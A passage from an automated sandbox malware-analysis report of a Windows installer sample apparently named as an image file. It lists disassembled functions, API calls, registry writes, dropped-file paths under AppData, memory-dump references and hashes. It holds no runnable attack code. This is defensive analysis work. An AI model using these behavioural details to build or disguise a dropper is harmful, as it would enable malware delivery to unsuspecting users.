                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp$C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging$Call
                                                                                      • API String ID: 1941528284-510131694
                                                                                      • Opcode ID: 51b74dc86fef2d0a8eb34d586d240b23fdfd01df71f14a7ce6a4c87c01a6f34f
                                                                                      • Instruction ID: 03788365e3babcef373fd792483c9ded1d717f2a290d89539055341019bd814b
                                                                                      • Opcode Fuzzy Hash: 51b74dc86fef2d0a8eb34d586d240b23fdfd01df71f14a7ce6a4c87c01a6f34f
                                                                                      • Instruction Fuzzy Hash: EC41E771900619BACB10BBA5CC46DAF3979DF46368B20423FF512F10E2D63C9A418A6D
                                                                                      Function 00404E88 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 604 404e88-404e9e 605 404f54-404f58 604->605 606 404ea4-404eb6 604->606 607 404ec1-404ecd lstrlenA 606->607 608 404eb8-404ebc call 405b9e 606->608 610 404eea-404eee 607->610 611 404ecf-404edf lstrlenA 607->611 608->607 613 404ef0-404ef7 SetWindowTextA 610->613 614 404efd-404f01 610->614 611->605 612 404ee1-404ee5 lstrcatA 611->612 612->610 613->614 615 404f03-404f45 SendMessageA * 3 614->615 616 404f47-404f49 614->616 615->616 616->605 617 404f4b-404f4e 616->617 617->605
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll
                                                                                      • API String ID: 2531174081-3193772269
                                                                                      • Opcode ID: b9a887e2e8e99461c1e009e2087a00ab7cd4c5483e1e4b6a4f4b237127957641
                                                                                      • Instruction ID: eeda2e428bcafe9b1d93ae7103e1ae34f7eca4b660a33a01a12bc20e9bc4de23
                                                                                      • Opcode Fuzzy Hash: b9a887e2e8e99461c1e009e2087a00ab7cd4c5483e1e4b6a4f4b237127957641
                                                                                      • Instruction Fuzzy Hash: 83218E71900158BADF019FA5CD80EDEBFB5EB45354F14807AFA04B6291C3789A84CFA8
                                                                                      Function 00404E89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 618 404e89-404e9e 619 404f54-404f58 618->619 620 404ea4-404eb6 618->620 621 404ec1-404ecd lstrlenA 620->621 622 404eb8-404ebc call 405b9e 620->622 624 404eea-404eee 621->624 625 404ecf-404edf lstrlenA 621->625 622->621 627 404ef0-404ef7 SetWindowTextA 624->627 628 404efd-404f01 624->628 625->619 626 404ee1-404ee5 lstrcatA 625->626 626->624 627->628 629 404f03-404f45 SendMessageA * 3 628->629 630 404f47-404f49 628->630 629->630 630->619 631 404f4b-404f4e 630->631 631->619
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll
                                                                                      • API String ID: 2531174081-3193772269
                                                                                      • Opcode ID: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                                                                      • Instruction ID: 7724d0d97f022e048e1d2ac042b23dfd392970f5166b6a7179c12b99d94f3706
                                                                                      • Opcode Fuzzy Hash: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                                                                      • Instruction Fuzzy Hash: 8B216071900158BBDF019FA5CD80EDEBFB9EB45354F14807AFA44B6291C7789E84CBA8
                                                                                      Function 00402E6C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 632 402e6c-402e82 633 402e84 632->633 634 402e8b-402e93 632->634 633->634 635 402e95 634->635 636 402e9c-402ea1 634->636 635->636 637 402eb1-402ebe call 403072 636->637 638 402ea3-402eac call 4030a4 636->638 642 403060 637->642 643 402ec4-402ec8 637->643 638->637 644 403062-403063 642->644 645 403001-403003 643->645 646 402ece-402ef1 GetTickCount 643->646 649 40306b-40306f 644->649 647 403005-403008 645->647 648 40304d-403050 645->648 650 402ef7 646->650 651 403068 646->651 647->651 652 40300a 647->652 654 403052 648->654 655 403055-40305e call 403072 648->655 653 402efc-402f04 650->653 651->649 657 40300f-403015 652->657 658 402f06 653->658 659 402f09-402f12 call 403072 653->659 654->655 655->642 664 403065 655->664 661 403017 657->661 662 40301a-403023 call 403072 657->662 658->659 659->642 668 402f18-402f21 659->668 661->662 662->642 669 403025-403038 WriteFile 662->669 664->651 670 402f27-402f47 call 405f87 668->670 671 40303a-40303d 669->671 672 402ffd-402fff 669->672 676 402ff9-402ffb 670->676 677 402f4d-402f64 GetTickCount 670->677 671->672 674 40303f-403049 671->674 672->644 674->657 678 40304b 674->678 676->644 679 402f66-402f6e 677->679 680 402fa9-402fad 677->680 678->651 681 402f70-402f74 679->681 682 402f76-402fa1 MulDiv wsprintfA call 404e89 679->682 683 402fee-402ff1 680->683 684 402faf-402fb2 680->684 681->680 681->682 689 402fa6 682->689 683->653 688 402ff7 683->688 686 402fd4-402fdf 684->686 687 402fb4-402fc8 WriteFile 684->687 691 402fe2-402fe6 686->691 687->672 690 402fca-402fcd 687->690 688->651 689->680 690->672 692 402fcf-402fd2 690->692 691->670 693 402fec 691->693 692->691 693->651
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                                                                      • GetTickCount.KERNEL32 ref: 00402F55
                                                                                      • MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00402F82
                                                                                      • wsprintfA.USER32 ref: 00402F92
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,007904A8,7FFFFFFF,00000000), ref: 00402FC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$FileWritewsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 4209647438-2449383134
                                                                                      • Opcode ID: 6888f4fa9f25908ec1f0c79b91c35943c4fb9507f2198910046352f248b09dd0
                                                                                      • Instruction ID: a0ae256f98bbca02c27974cb92508b0609fc84214e278a3d68230cc4162abf99
                                                                                      • Opcode Fuzzy Hash: 6888f4fa9f25908ec1f0c79b91c35943c4fb9507f2198910046352f248b09dd0
                                                                                      • Instruction Fuzzy Hash: D6519C7190121AABCF10DF69DA48A9E7BB8BB04355F14413BF900B72C4D3789E50DBAA
                                                                                      Function 0040231A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 694 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 701 402366-40236e 694->701 702 40289c-4028ab 694->702 704 402370-40237d call 402a07 lstrlenA 701->704 705 40237e-402381 701->705 704->705 708 402391-402394 705->708 709 402383-402390 call 4029ea 705->709 710 4023a5-4023b9 RegSetValueExA 708->710 711 402396-4023a0 call 402e6c 708->711 709->708 716 4023bb 710->716 717 4023be-402494 RegCloseKey 710->717 711->710 716->717 717->702 719 40266d-402674 717->719 719->702
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp
                                                                                      • API String ID: 1356686001-3798918962
                                                                                      • Opcode ID: 06eb57789b14162b18d235ce7a715208800a1d0dc1c85a09880f26651364c2a2
                                                                                      • Instruction ID: c186b2a4276190d5bc678cf3fdc7432ddc4badc979a32f69cf8a69a4641a35af
                                                                                      • Opcode Fuzzy Hash: 06eb57789b14162b18d235ce7a715208800a1d0dc1c85a09880f26651364c2a2
                                                                                      • Instruction Fuzzy Hash: 3E116071E00208BFEB10EFB5CE89EAF7A78EB44358F10403AF905B71D1D6B85D419A69
                                                                                      Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 720 4015b3-4015c6 call 402a07 call 4056c2 725 4015c8-4015e3 call 405654 CreateDirectoryA 720->725 726 40160a-40160d 720->726 733 401600-401608 725->733 734 4015e5-4015f0 GetLastError 725->734 728 401638-40217f call 401423 726->728 729 40160f-40162a call 401423 call 405b7c SetCurrentDirectoryA 726->729 742 40289c-4028ab 728->742 743 40266d-402674 728->743 729->742 745 401630-401633 729->745 733->725 733->726 737 4015f2-4015fb GetFileAttributesA 734->737 738 4015fd 734->738 737->733 737->738 738->733 743->742 745->742
                                                                                      APIs
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
                                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,?), ref: 00401622
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 00401617
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17878252319.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 3751793516-2495297767
                                                                                      • Opcode ID: abddc800633dd95d775d80f783ae593f51e4c76b4448ee96aca239786a011afb
                                                                                      • Instruction ID: f6d043a697dbba063d8ca4a6451cbbc07de469f39b9323e3bb4b0ee781e04bf7
                                                                                      • Opcode Fuzzy Hash: abddc800633dd95d775d80f783ae593f51e4c76b4448ee96aca239786a011afb
                                                                                      • Instruction Fuzzy Hash: 9F115531908140ABDB207F745C04DBF3BB0EA66366724073FF491B22E2C63C0942862E
                                                                                      Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                      • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                        • Part of subcall function 10002165: GlobalAlloc.KERNEL32(?,8A470175), ref: 10002197
                                                                                        • Part of subcall function 10002540: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                                                                        • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                        • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                                                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1767494692-3916222277
                                                                                      • Opcode ID: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                                                                      • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                                                                      • Opcode Fuzzy Hash: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                                                                      • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                                                                      Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17877363104.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877524726.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.17877583006.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
